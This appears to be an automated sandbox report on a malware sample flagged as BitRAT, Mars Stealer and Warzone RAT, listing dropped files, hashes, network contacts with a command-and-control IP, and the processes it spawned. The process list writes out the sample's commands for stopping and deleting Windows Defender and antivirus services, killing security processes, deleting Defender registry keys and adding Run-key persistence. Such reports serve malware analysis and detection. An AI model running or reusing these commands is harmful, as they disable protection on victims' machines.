| File created | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpClient.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe
"C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe"
C:\Program Files\Microsoft.exe
"C:\Program Files\Microsoft.exe"
C:\Program Files\Builded.exe
"C:\Program Files\Builded.exe"
C:\Program Files\installerX32.exe
"C:\Program Files\installerX32.exe"
C:\Program Files\InstallerX64.exe
"C:\Program Files\InstallerX64.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADA.tmp\ADB.tmp\ADC.bat "C:\Program Files\installerX32.exe""
C:\Program Files\Microsoft office.exe
"C:\Program Files\Microsoft office.exe"
C:\Windows\system32\sc.exe
sc config windefend start= disabled
C:\Windows\system32\sc.exe
sc stop windefend
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\sc.exe
sc stop WdNisSvc
C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
C:\Windows\system32\sc.exe
sc delete WdNisSvc
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\sc.exe
sc config Sense start= disabled
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\Windows\system32\sc.exe
sc stop usosvc
C:\Windows\system32\sc.exe
sc config usosvc start= disabled
C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\sc.exe
sc stop SDRSVC
C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
C:\Windows\system32\sc.exe
sc stop wscsvc
C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
C:\Windows\system32\sc.exe
sc stop WdiServiceHost
C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
C:\Windows\system32\sc.exe
sc stop WdiSystemHost
C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
C:\Windows\system32\sc.exe
sc stop InstallService
C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
C:\Windows\system32\sc.exe
sc stop VaultSvc
C:\Windows\system32\sc.exe
sc config VaultSvc start= disabled
C:\Windows\system32\sc.exe
sc stop Spooler
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\Windows\system32\sc.exe
sc config Spooler start= disabled
C:\Windows\system32\sc.exe
sc stop LicenseManager
C:\Windows\system32\sc.exe
sc config LicenseManager start= disabled
C:\Windows\system32\sc.exe
sc stop DiagTrack
C:\Windows\system32\sc.exe
sc config DiagTrack start= disabled
C:\Windows\system32\taskkill.exe
taskkill /f /im smartscreen.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Windows\System32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im SystemSettings.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
C:\Windows\SysWOW64\sc.exe
sc delete windefend
C:\Windows\SysWOW64\sc.exe
sc delete sense
C:\Windows\SysWOW64\sc.exe
sc stop nsWscSvc
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAMWsc.exe
C:\Windows\SysWOW64\sc.exe
sc stop MBAMService
C:\Windows\SysWOW64\sc.exe
sc config MBAMService start= disabled
C:\Windows\SysWOW64\sc.exe
sc delete MBAMService
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAM.exe
C:\Windows\SysWOW64\sc.exe
sc stop Bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc config Bytefenceservice start= disabled
C:\Windows\SysWOW64\sc.exe
sc delete Bytefenceservice
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Bytefence.exe
C:\Windows\system32\sc.exe
sc stop "avast! Tools"
C:\Windows\system32\sc.exe
sc config "avast! Tools" start= disabled
C:\Windows\system32\sc.exe
sc delete "avast! Tools"
C:\Windows\system32\sc.exe
sc stop "avast! Antivirus"
C:\Windows\system32\sc.exe
sc config "avast! Antivirus" start= disabled
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp |
Files
memory/1996-54-0x00000000752B1000-0x00000000752B3000-memory.dmp
\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
memory/576-59-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
memory/584-66-0x0000000000000000-mapping.dmp
C:\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
memory/608-71-0x0000000000000000-mapping.dmp
C:\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
memory/1640-77-0x0000000000000000-mapping.dmp
memory/872-78-0x0000000000000000-mapping.dmp
C:\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
C:\Users\Admin\AppData\Local\Temp\ADA.tmp\ADB.tmp\ADC.bat
| MD5 | 3c92f725b696f48b1ae5386c6b88147d |
| SHA1 | 7d80fab21ff225acdefbe3c33e11d57dbd58244b |
| SHA256 | 50b7883ad90bcf0b20671b7f0de20d11e4dd88aa2d17cc36b0b0171ca9e800d2 |
| SHA512 | ceedc8835db458884cd49918981965610e2804e0dc42d2ae6eb3aa4c5c281b684978fa73a934faf513184a40fd6b8db8909e90ad86ee152cb63990a87f9c5d03 |
\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
memory/2016-87-0x0000000000000000-mapping.dmp
\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
memory/1352-90-0x0000000000000000-mapping.dmp
memory/2016-89-0x0000000000400000-0x00000000007CE000-memory.dmp
C:\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
memory/1656-86-0x0000000000000000-mapping.dmp
memory/1508-92-0x0000000000000000-mapping.dmp
memory/584-93-0x0000000000400000-0x000000000043D000-memory.dmp
memory/828-94-0x0000000000000000-mapping.dmp
memory/1948-95-0x0000000000000000-mapping.dmp
memory/776-96-0x0000000000000000-mapping.dmp
memory/1172-97-0x0000000000000000-mapping.dmp
memory/928-98-0x0000000000000000-mapping.dmp
memory/1688-99-0x0000000000000000-mapping.dmp
memory/972-100-0x0000000000000000-mapping.dmp
memory/996-101-0x0000000000000000-mapping.dmp
memory/1988-102-0x0000000000000000-mapping.dmp
memory/1776-103-0x0000000000000000-mapping.dmp
memory/1084-104-0x0000000000000000-mapping.dmp
memory/848-105-0x0000000000000000-mapping.dmp
memory/1752-106-0x0000000000000000-mapping.dmp
memory/1204-107-0x0000000000000000-mapping.dmp
memory/1728-108-0x0000000000000000-mapping.dmp
memory/1740-109-0x0000000000000000-mapping.dmp
memory/948-110-0x0000000000000000-mapping.dmp
memory/1636-111-0x0000000000000000-mapping.dmp
memory/1676-112-0x0000000000000000-mapping.dmp
memory/1956-113-0x0000000000000000-mapping.dmp
memory/568-114-0x0000000000000000-mapping.dmp
memory/564-115-0x0000000000000000-mapping.dmp
memory/772-116-0x0000000000000000-mapping.dmp
memory/1412-117-0x0000000000000000-mapping.dmp
memory/1900-118-0x0000000000000000-mapping.dmp
memory/1540-119-0x0000000000000000-mapping.dmp
memory/340-120-0x0000000000000000-mapping.dmp
memory/1708-121-0x0000000000000000-mapping.dmp
memory/108-122-0x0000000000000000-mapping.dmp
memory/1508-123-0x0000000000000000-mapping.dmp
memory/1004-124-0x0000000000000000-mapping.dmp
memory/1948-125-0x0000000000000000-mapping.dmp
memory/1108-126-0x0000000000000000-mapping.dmp
memory/1172-127-0x0000000000000000-mapping.dmp
memory/1336-128-0x0000000000000000-mapping.dmp
memory/1744-129-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
memory/948-131-0x0000000000000000-mapping.dmp
memory/1676-132-0x0000000000000000-mapping.dmp
memory/568-133-0x0000000000000000-mapping.dmp
memory/772-134-0x0000000000000000-mapping.dmp
memory/1820-135-0x0000000000000000-mapping.dmp
memory/1784-136-0x0000000000000000-mapping.dmp
memory/1528-137-0x0000000000000000-mapping.dmp
memory/1540-138-0x0000000000000000-mapping.dmp
memory/704-139-0x0000000000000000-mapping.dmp
memory/1992-140-0x0000000000000000-mapping.dmp
memory/1836-141-0x0000000000000000-mapping.dmp
memory/1572-142-0x0000000000000000-mapping.dmp
memory/1932-143-0x0000000000000000-mapping.dmp
memory/1032-144-0x0000000000000000-mapping.dmp
memory/1240-145-0x0000000000000000-mapping.dmp
memory/1280-146-0x0000000000000000-mapping.dmp
memory/536-147-0x0000000000000000-mapping.dmp
memory/1148-148-0x0000000000000000-mapping.dmp
memory/828-149-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
memory/1280-152-0x0000000000260000-0x0000000000261000-memory.dmp
memory/584-153-0x0000000000400000-0x000000000043D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-03 19:42
Reported
2023-01-03 19:47
Platform
win10v2004-20220812-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
BitRAT
Mars Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security | C:\Windows\system32\reg.exe | N/A |
WarzoneRat, AveMaria
Warzone RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Program Files\InstallerX64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Program Files\installerX32.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost\ue800" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost舀" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost伀" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost瘀" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost\ue000" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe" | C:\Program Files\Microsoft.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
